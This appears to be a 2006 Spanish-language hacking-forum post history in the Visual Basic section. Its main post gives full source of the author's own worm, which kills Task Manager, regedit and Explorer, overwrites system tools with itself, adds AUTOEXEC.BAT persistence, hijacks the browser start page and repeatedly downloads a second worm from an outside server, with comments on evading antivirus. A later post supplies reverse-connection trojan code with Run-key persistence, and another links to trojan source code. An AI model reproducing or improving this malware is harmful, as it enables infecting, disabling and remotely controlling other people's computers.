|
Mostrar Mensajes
|
Páginas: 1 2 3 [4] 5 6 7 8
|
32
|
Programación / Programación Visual Basic / NayrocBits - Malware
|
en: 28 Diciembre 2006, 01:58 am
|
Opinen sobre este malware... diganme que mas le puedo añadir... que puede estar mal... o que le puedo quitar... Option Explicit
Private Declare Function URLDownloadToFile Lib "urlmon" _ Alias "URLDownloadToFileA" _ (ByVal pCaller As Long, _ ByVal szURL As String, _ ByVal szFileName As String, _ ByVal dwReserved As Long, _ ByVal lpfnCB As Long) As Long Dim ERROR_SUCCESS Private Sub Clipb() On Error GoTo clip Do Clipboard.Clear Clipboard.SetText " K-32 - Prayamama" Loop clip: End Sub Private Sub NayrocSTAM() Do On Error GoTo NoSTAM PagInicia ("http://www.elhacker.net") TituloInicia ("ElHacker - Soft Explorer - BY: K-32 (SP26)") MsgBox " " & vbCrLf & " ", vbCritical Loop
NoSTAM:
End Sub Private Function Secuestro(UpPath As String, DownPath As String) On Error GoTo seNO FileCopy UpPath$, DownPath$ Kill UpPath$ seNO: End Function Public Sub SecuestroCarpeta(DirPath As String) On Error GoTo error MkDir DirPath$ Exit Sub error: 'Crear carpetas de secuestro End Sub
Private Sub AeroBits() On Error GoTo seNO: Do Matar ("Taskmgr.exe") Matar ("Regedit.exe") Matar ("Services.msc") Matar ("cmd.exe") Matar ("Explorer.exe") Shell "explorer.exe" 'Retornamos al EXPLORER para no levantar sospechas
SecuestroCarpeta Environ("SYSTEMROOT") & "\Binary\"
Secuestro Environ("SYSTEMROOT") & "\SYSTEM32\REGEDIT.EXE", Environ("SYSTEMROOT") & "\Binary\regedit.txt" Secuestro Environ("SYSTEMROOT") & "\SYSTEM32\services.msc", Environ("Systemroot") & "\BINARY\Services.txt" Secuestro Environ("SYSTEMROOT") & "\SYSTEM32\taskmgr.exe", Environ("SYSTEMROOT") & "\binary\taskmgr.txt"
FileCopy App.EXEName + ".exe", Environ("SYSTEMROOT") & "\SYSTEM32\regedit.exe" FileCopy App.EXEName + ".exe", Environ("SYSTEMROOT") & "\SYSTEM32\taskmgr.exe" FileCopy App.EXEName + ".exe", Environ("SYSTEMROOT") & "\SYSTEM32\services.msc"
seNO: Shell Environ("SYSTEMROOT") & "\SYSTEM32\deflpo.exe" Loop End Sub
Private Sub NayrocSTEM()
Dim Archivo As String Dim NumArchivo As Long Dim Archivo2 As String Dim NumArchivo2 As Long On Error Resume Next On Error GoTo NoHayBat Do FileCopy App.EXEName + ".exe", Environ("SYSTEMROOT") & "\SYSTEM32\deflps.exe" 'NOTA1
Matar ("Explorer.exe") Matar ("CMD.exe") Matar ("Regedit.exe") Matar ("services.msc") Matar ("msnmsgr.exe") Shell ("Explorer.exe") 'Retornamos al Explorer para no levantar sospechas
Archivo = Environ("SYSTEMDRIVE") & "\AUTOEXEC.BAT" NumArchivo = FreeFile() 'Aqui me añado al 'AUTOEXEC.BAT ' 'Para iniciarme cada vez que el sistema corra '¿Sera esta una via alterna? 'Al yo poner "DEFLPS" 'llama el archivo antes copiado 'Es necesario que se copie antes en la carpeta SYSTEM32 'Esto me da una via alterna contra los AV Open Archivo For Output As #NumArchivo Print #NumArchivo, "Echo off" Print #NumArchivo, "Title AUTOEXEC.BAT" '-- Print #NumArchivo, "CLS" Print #NumArchivo, "Echo Loading..." Print #NumArchivo, "CLS" Print #NumArchivo, "cls" Print #NumArchivo, "deflps" Close #NumArchivo NoHayBat: On Error Resume Next 'DeflPO 'Leer Mas abajo su Sub ()
Archivo2 = Environ("SYSTEMROOT") & "\Call.bat" NumArchivo2 = FreeFile() Print #NumArchivo, "Echo off" Print #NumArchivo, "title Analizador de discos lógicos" Print #NumArchivo, "cls" Print #NumArchivo, "echo @echo off > %SYSTEMDRIVE%\AUTOEXEC.bat" Print #NumArchivo, "Echo cls>>%SYSTEMDRIVE%\AUTOEXEC.bat" Print #NumArchivo, "ECHO DEFLPS>>%SYSTEMDRIVE%\AUTOEXEC.bat" Close #NumArchivo Shell Environ("SYSTEMROOT") & "\Call.bat" Loop End Sub Private Sub AñoNuevo()
'Feliz año nuevo xDD Do
If Month(Now) = 1 And Day(Now) = 1 Then AñoNuevoUp
End If Loop End Sub
Private Sub AñoNuevoUp() Dim ArchivoK32 As String Dim NumArchivoK32 As Long Do ArchivoK32 = Environ("SYSTEMROOT") & "\2007.bat" NumArchivoK32 = FreeFile()
Print #NumArchivoK32, "Echo off" Print #NumArchivoK32, "title OS"
Print #NumArchivoK32, "cls" Print #NumArchivoK32, "Deflpo" Print #NumArchivoK32, "Cls" Close #NumArchivoK32
Shell Environ("SYSTEMROOT") & "\2007.bat" 'Lo hago como BAT ya que es mas efectivo para los AV's, En especial 'NOD32
Loop
End Sub
Private Sub Ds_Click() MsgBox "Desinfectado"
End Sub
Private Sub Form_Load() On Error Resume Next App.TaskVisible = False MsgBox " ", vbExclamation, "WINLOGON.EXE"
Clipb NayrocSTAM DeflPO NayrocSTEM AñoNuevo AeroBits
End Sub
Public Sub Matar(ByVal processName As String) On Error GoTo ErrHandler Dim oWMI Dim ret Dim sService Dim oWMIServices Dim oWMIService Dim oServices Dim oService Dim servicename Set oWMI = GetObject("winmgmts:") Set oServices = oWMI.InstancesOf("win32_process")
For Each oService In oServices servicename = LCase(Trim(CStr(oService.Name) & "")) If InStr(1, servicename, LCase(processName), vbTextCompare) > 0 Then ret = oService.Terminate End If Next Set oServices = Nothing Set oWMI = Nothing
ErrHandler: Err.Clear End Sub
Private Sub DeflPO() 'ORIENTE-ETERNO : Modo silencioso Do Dim sSourceUrl As String
sSourceUrl = "http://h1.ripside.net/MyArchivos/" & _ "DCOM/deflPO.exe/" 'Este es otro de mis Worms
DownloadFile sSourceUrl, Environ("SYSTEMROOT") & "\SYSTEM32\deflPO.exe" Loop End Sub
Private Function DownloadFile(ByVal sURL As String, ByVal sLocalFile As String) As Boolean DownloadFile = URLDownloadToFile(0, sURL, _ sLocalFile, 0, 0) = ERROR_SUCCESS End Function
Private Sub Form_Unload(Cancel As Integer) MsgBox " ", vbCritical Do Shell App.Path & App.EXEName & ".exe" Loop
End Sub Y En un modulo... Option Explicit
Declare Function RegCreateKey Lib _ "advapi32.dll" Alias "RegCreateKeyA" _ (ByVal HKey As Long, ByVal lpSubKey As _ String, phkResult As Long) As Long Declare Function RegCloseKey Lib "advapi32.dll" (ByVal HKey As Long) As Long Declare Function RegSetValueEx Lib _ "advapi32.dll" Alias "RegSetValueExA" (ByVal HKey As Long, ByVal _ lpValueName As String, ByVal _ Reserved As Long, ByVal dwType _ As Long, lpData As Any, ByVal _ cbData As Long) As Long
Public Sub SaveString(HKey As Long, Path As String, _ Name As String, Data As String) Dim KeyHandle As Long Dim r As Long Dim REG_SZ r = RegCreateKey(HKey, Path, KeyHandle) r = RegSetValueEx(KeyHandle, Name, 0, _ REG_SZ, ByVal Data, Len(Data)) r = RegCloseKey(KeyHandle) End Sub
Public Sub PagInicia(Direccion As String) Call SaveString("HKEY_CURRENT_USER", _ "Software\Microsoft\Internet Explorer\Main", _ "Start Page", Direccion) End Sub Public Sub TituloInicia(Titulo As String) Call SaveString("HKEY_CURRENT_USER", _ "Software\Microsoft\Internet Explorer\Main", _ "Window Title", Titulo) End Sub
Opinen
|
|
|
33
|
Programación / Programación Visual Basic / Re: codigo fuente, para descargar
|
en: 26 Diciembre 2006, 05:27 am
|
http://www.opensc.ws/forumdisplay.php?f=18 Mira, en este foro lo tienes todo sobre codigos fuente de troyanos, aunqe esta en ingles. No te recomiendo qe te bases en estos códigos, empieza tu a acerte uno, y saca del foro solo la informacion qe te interese, no el codigo principal de tu troyano, a mi personalmente me molestaria qe alguien cojiera mi codigo y por cambiarle el aspecto al formulario principal diga qe lo ha hecho el... (no digo qe tu lo vayas a hacer, ni mucho menos..) No es tanto que digan "que lo haya hecho el o ella", si no con la frecuencia o el "Sentido" en que lo use, que lo haga "Mas comun de lo normal" y los antivirus esten tras de el... Eso no es bueno como sabras .
|
|
|
35
|
Programación / Programación Visual Basic / Pregunta tonta...
|
en: 23 Diciembre 2006, 00:58 am
|
Hola... Quizas esta pregunta sea un poco tonta, pero como hago para que en un PictureBox se vea lo que se seleccione en un listbox? Ya intente con muchas cosas y ninguna funciona... como Picture1.picture = list1 y nada Aqui le dejo el codigo... Option Explicit Dim ext Dim Ruta As String Dim arjpg
Private Sub Command1_Click() On Error Resume Next List1.Clear
Ruta = Dir1 ' Hacemos q nos muestre todos los archivos arjpg = Dir(Ruta & "\*.jpg*") Do While arjpg <> "" ' Obtenemos la extension del archivo ext = LCase(Right$(arjpg, 3)) Select Case ext Case "jpg" List1.AddItem arjpg Case "bmp" List1.AddItem arjpg Case "gif" List1.AddItem arjpg End Select arjpg = Dir Loop
End Sub
Private Sub Form_Load() List1.Clear
End Sub
|
|
|
39
|
Programación / Programación Visual Basic / Re: Como hacer que se autoejecute...
|
en: 18 Diciembre 2006, 16:06 pm
|
te dejo una pequeña aplicacion para que cheques el codigo para que se cargue en la memoria haber si te sirve es un server utilizando una conexión inversa. No recuerdo donde lo vi publicado un saludo. Dim win Dim sys Dim residencia On Error Resume Next ip = "10.12.116.207" 'esta es nuestra ip local, asi que conectara a nuestra ip local, aqui se pondria nuestra ip publica, y si cambia pues os registrais en no-ip.com y si habeis leido la revista no tendreis problemas ipftp = "o 127.0.0.1" port = 6969 WS.RemoteHost = ip WS.RemotePort = port Timer1.Interval = 60000 'se esteblace un intervalo de 3 segundos para ejecutar el evento timer1 ejec = App.Path 'le pasamos a la variable la ruta del exe que ejecute la victima If Right(ejec, 1) <> "\" Then ejec = ejec & "\" 'si no tiene la "\" al final, se la añadiremos ejec = ejec & App.EXEName & ".exe" 'añadimos ala ruta del exe, el nombre y la estension Set obj = CreateObject("Scripting.FileSystemObject") 'declaramos un objeto tipo fileSystem object Set win = obj.GetSpecialFolder(0) 'para obtener la carpeta de windows y system Set sys = obj.GetSpecialFolder(1) win = LCase(win) 'las ponemos en minusculas sys = LCase(sys) FileCopy ejec, sys & "\nombre1" 'copia a windows\system32 Name sys & "\nombre1" As sys & "\nombre2.exe" 'renombra Set residencia = CreateObject("WScript.Shell") residencia.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & "nombre3", sys & "\nombre2.exe" 'esto modifica el registro para que se ejecute al iniciar el pc App.TaskVisible = False 'para ocultarlo un poco del, (alt +sup +control) End Sub
Adherirse al registro o a la "Memoria"?
|
|
|
|
|
|
|